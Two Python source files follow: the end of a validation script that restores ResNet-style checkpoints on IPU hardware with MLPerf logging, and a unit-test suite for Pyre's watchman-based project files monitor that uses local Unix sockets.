"epoch_count": opts["epochs"]}
)
for i in range(num_files):
if opts['distributed_worker_index'] == 0:
filename = filenames[i]
print(filename)
if filename:
valid.saver.restore(valid.session, filename)
pattern_match = ckpt_pattern.match(filename)
if pattern_match:
iteration = int(pattern_match.groups()[0])
else:
iteration = -1
else:
print("Warning: no restore point found - randomly initialising weights instead")
valid.session.run(valid.init)
iteration = 0
else:
iteration = 0
if opts['use_popdist']:
iteration = valid.session.run(valid.ops['broadcast_iteration'],
feed_dict={valid.placeholders['iteration']: iteration})
epoch = float(total_batch_size * iteration) / DATASET_CONSTANTS[opts['dataset']]['NUM_IMAGES']
for r in range(opts["repeat"]):
stats = validation_run(valid, None, iteration, epoch, i == 0, opts, latency_thread)
# Handle skipped case
if stats and "val_size" in stats and "val_acc" in stats:
if stats["val_acc"] > MLPERF_EVAL_TARGET:
success = True
logging.mlperf_logging(key="BLOCK_STOP", log_type="stop",
metadata={"first_epoch_num": 1}
)
logging.mlperf_logging(key="RUN_STOP",
value={"success": success},
metadata={"epoch_num": round(epoch),
"status": "success" if success else "aborted"})
def add_main_arguments(parser):
group = parser.add_argument_group('Main')
group.add_argument('--model', default='resnet', help="Choose model")
group.add_argument('--restore-path', type=str,
help="Path to a single checkpoint to restore from or directory containing multiple checkpoints")
group.add_argument('--repeat', type=int, default=1,
help="Repeat validation for debugging purposes")
group.add_argument('--inference', type=bool, default=False,
help="""Run in inference mode, disabling accuracy all-reduce between replicas.
Useful for benchmarking.""")
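# Note: argparse's type=bool converts any non-empty string to True, so
# "--inference False" on the command line still enables inference mode;
# supply the flag only when inference behaviour is actually wanted.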
group.add_argument('--help', action='store_true', help='Show help information')
return parser
def set_main_defaults(opts):
opts['summary_str'] = "\n"
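# set_validation_defaults sizes the validation run so that every validation
# image is seen at least once. Worked example with illustrative numbers
# (assuming 50000 validation images and a total validation batch size of
# 1000): (50000 + 128) // 1000 + 1 = 51 batches are needed; with
# batches_per_step = 16 they are grouped into 51 // round(51 / 16) = 17
# batches per step, giving ceil(51 / 17) = 3 session runs per validation.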
def set_validation_defaults(opts):
if not opts['validation']:
opts['summary_str'] += "No Validation\n"
else:
opts['validation_total_batch_size'] = opts['batch_size']*opts['shards']*opts['replicas']*opts['distributed_worker_count']
opts['summary_str'] += "Validation\n Batch Size: {}\n".format("{validation_total_batch_size}")
opts["validation_iterations"] = (
(int(DATASET_CONSTANTS[opts['dataset']]['NUM_VALIDATION_IMAGES']) + 128) //
opts["validation_total_batch_size"]) + 1
if opts["batches_per_step"] < opts["validation_iterations"]:
opts["validation_batches_per_step"] = int(opts["validation_iterations"] //
int(round(opts["validation_iterations"] / opts['batches_per_step'])))
opts["validation_iterations"] = int((opts["validation_iterations"] +
opts["validation_batches_per_step"] - 1) / opts["validation_batches_per_step"])
else:
opts["validation_batches_per_step"] = opts["validation_iterations"]
opts["validation_iterations"] = 1
def create_parser(model, parser):
parser = model.add_arguments(parser)
parser = dataset.add_arguments(parser)
parser = train.add_training_arguments(parser)
parser = train.add_ipu_arguments(parser)
parser = logging.add_arguments(parser)
return parser
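# Distribution settings are read from the popdist runtime when the process is
# launched by a distributed launcher (typically poprun); otherwise the run is
# treated as a single worker.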
def set_distribution_defaults(opts):
if opts['use_popdist']:
opts['distributed_worker_count'] = popdist.getNumInstances()
opts['distributed_worker_index'] = popdist.getInstanceIndex()
opts['distributed_cluster'] = None
opts['summary_str'] += 'Popdist\n'
opts['summary_str'] += ' Process count: {distributed_worker_count}\n'
opts['summary_str'] += ' Process index: {distributed_worker_index}\n'
else:
opts['distributed_worker_count'] = 1
opts['distributed_worker_index'] = 0
opts['distributed_cluster'] = None
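# Order matters here: dataset, model and distribution defaults populate the
# batch size, shard, replica and worker counts that set_validation_defaults
# then uses to size the validation run.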
def set_defaults(model, opts):
set_main_defaults(opts)
dataset.set_defaults(opts)
model.set_defaults(opts)
set_distribution_defaults(opts)
set_validation_defaults(opts)
train.set_ipu_defaults(opts)
logging.set_defaults(opts)
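# Entry point: the main and configuration arguments are parsed first so the
# requested model module can be imported, then the full parser (model,
# dataset, training, IPU and logging options) is built and parsed again.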
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Validation for previously generated checkpoints.', add_help=False)
parser = add_main_arguments(parser)
parser = configurations.add_arguments(parser)
args, unknown = parser.parse_known_args()
args = configurations.parse_config(args, parser, known_args_only=True)
args = vars(args)
try:
model = importlib.import_module("Models." + args['model'])
except ImportError:
raise ValueError('Models/{}.py not found'.format(args['model']))
parser = create_parser(model, parser)
opts = parser.parse_args()
opts = configurations.parse_config(opts, parser)
opts = vars(opts)
print(opts)
if args['help']:
parser.print_help()
else:
if popdist.isPopdistEnvSet():
opts['use_popdist'] = True
opts['replicas'] = popdist.getNumLocalReplicas()
opts['total_replicas'] = popdist.getNumTotalReplicas()
opts['select_ipu'] = str(popdist.getDeviceId())
else:
opts['use_popdist'] = False
opts['total_replicas'] = opts['replicas']
opts["command"] = ' '.join(sys.argv)
set_defaults(model, opts)
if opts['dataset'] == 'imagenet':
if opts['image_size'] is None:
opts['image_size'] = 224
elif 'cifar' in opts['dataset']:
opts['image_size'] = 32
if opts["wandb"] and opts["distributed_worker_index"] == 0:
logging.initialise_wandb(opts)
logging.print_to_file_and_screen("Command line: " + opts["command"], opts)
logging.print_to_file_and_screen(opts["summary_str"].format(**opts), opts)
opts["summary_str"] = ""
logging.print_to_file_and_screen(opts, opts)
validation_only_process(model, opts)
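# Hypothetical invocation (the script name is assumed; --model, --restore-path
# and --repeat are the options defined above, any other flags come from the
# imported modules):
#   python validation.py --model resnet --restore-path ./checkpoints --repeat 1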
|
project_files_monitor_test.py
|
# Copyright (c) 2019-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import socket
import tempfile
import threading
import unittest
from unittest.mock import MagicMock, patch
from .. import language_server_protocol, project_files_monitor
from ..filesystem import UpdatedPaths
from ..language_server_protocol import (
LanguageServerProtocolMessage,
read_message,
write_message,
)
from ..project_files_monitor import Monitor, MonitorException, SocketConnection
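# These tests exercise the Monitor's watchman subscription construction (with
# and without extra file extensions), the error raised for a missing server
# socket, the handshake/updateFiles exchange over a local Unix socket, the
# cleanup of the file_monitor lock and pid files, and the resolution of
# symlinked socket paths.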
class MonitorTest(unittest.TestCase):
@patch.object(language_server_protocol, "perform_handshake")
@patch.object(Monitor, "_connect_to_socket")
@patch.object(project_files_monitor, "find_root")
def test_subscriptions(self, find_root, _connect_to_socket, perform_handshake):
find_root.return_value = "/ROOT"
arguments = MagicMock()
configuration = MagicMock()
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = "/ROOT"
# no additional extensions
configuration.extensions = []
monitor = Monitor(arguments, configuration, analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:3],
["allof", ["type", "f"], ["not", "empty"]],
)
self.assertCountEqual(
subscription.subscription["expression"][3],
["anyof", ["suffix", "py"], ["suffix", "pyi"]],
)
# additional extensions
configuration.extensions = ["thrift", "whl"]
monitor = Monitor(arguments, configuration, analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:3],
["allof", ["type", "f"], ["not", "empty"]],
)
self.assertCountEqual(
subscription.subscription["expression"][3],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["suffix", "whl"],
],
)
# no watchman root -> terminate
find_root.return_value = None
self.assertRaises(
MonitorException, Monitor, arguments, configuration, analysis_directory
)
def test_bad_socket(self):
with tempfile.TemporaryDirectory() as root:
bad_socket_path = os.path.join(root, "bad.sock")
self.assertRaises(
MonitorException, Monitor._connect_to_socket, bad_socket_path
)
@patch.object(Monitor, "_find_watchman_path")
def test_socket_communication(self, _find_watchman_path):
# Create a "server" thread to complete the handshake
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
errors = []
with tempfile.TemporaryDirectory() as root:
socket_path = os.path.join(root, ".pyre", "server", "json_server.sock")
os.makedirs(os.path.dirname(socket_path))
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
outfile = connection.makefile(mode="wb")
infile = connection.makefile(mode="rb")
write_message(
outfile,
LanguageServerProtocolMessage(
method="handshake/server", parameters={"version": "123"}
),
)
response = read_message(infile)
if not response or response.method != "handshake/client":
errors.append("Client handshake malformed")
return
updated_message = read_message(infile)
if (
not updated_message
or updated_message.method != "updateFiles"
or not updated_message.parameters
or updated_message.parameters.get("files")
!= ["/ANALYSIS/a.py", "/ANALYSIS/subdir/b.py"]
):
errors.append("Update message malformed")
server_thread = threading.Thread(target=server)
server_thread.start()
arguments = MagicMock()
configuration = MagicMock()
configuration.extensions = []
configuration.version_hash = "123"
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = root
analysis_directory.process_updated_files.side_effect = lambda files: UpdatedPaths(
updated=[file.replace("ROOT", "ANALYSIS") for file in files],
invalidated=[],
)
# only create the monitor once the socket is open
with socket_created_lock:
monitor = Monitor(arguments, configuration, analysis_directory)
monitor._handle_response(
{"root": "/ROOT", "files": ["a.py", "subdir/b.py"]}
)
analysis_directory.process_updated_files.assert_called_once_with(
["/ROOT/a.py", "/ROOT/subdir/b.py"]
)
server_thread.join()
self.assertEqual(errors, [])
@patch.object(language_server_protocol, "perform_handshake")
@patch.object(Monitor, "_watchman_client")
@patch.object(Monitor, "_connect_to_socket")
@patch.object(Monitor, "_find_watchman_path")
def test_files_cleaned_up(
self,
_find_watchman_path,
_connect_to_socket,
_watchman_client,
perform_handshake,
):
with tempfile.TemporaryDirectory() as root:
arguments = MagicMock()
configuration = MagicMock()
configuration.extensions = []
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = root
monitor = Monitor(arguments, configuration, analysis_directory)
monitor._alive = False # never enter watchman loop
monitor._run()
monitor_folder = os.path.join(root, ".pyre", "file_monitor")
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.lock"))
)
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.pid"))
)
@patch.object(os.path, "realpath")
def test_socket_connection(self, realpath):
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
with tempfile.TemporaryDirectory() as root:
realpath.side_effect = lambda path: path.replace(
os.path.dirname(path), root # replace parent directories with tempdir
)
# Unix sockets have a limited length of ~100 characters, so the server uses
# symbolic links as a workaround. We need to properly translate these.
socket_link = os.path.join(
"long_name" * 15, ".pyre", "server", "json_server.sock"
)
socket_path = os.path.join(root, "json_server.sock")
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
server_thread = threading.Thread(target=server)
server_thread.start()
with socket_created_lock:
Monitor._connect_to_socket(socket_link)
server_thread.join()
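# To run this module on its own (the package path is an assumption and may
# differ in the actual repository layout):
#   python -m unittest <package>.tests.project_files_monitor_test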
|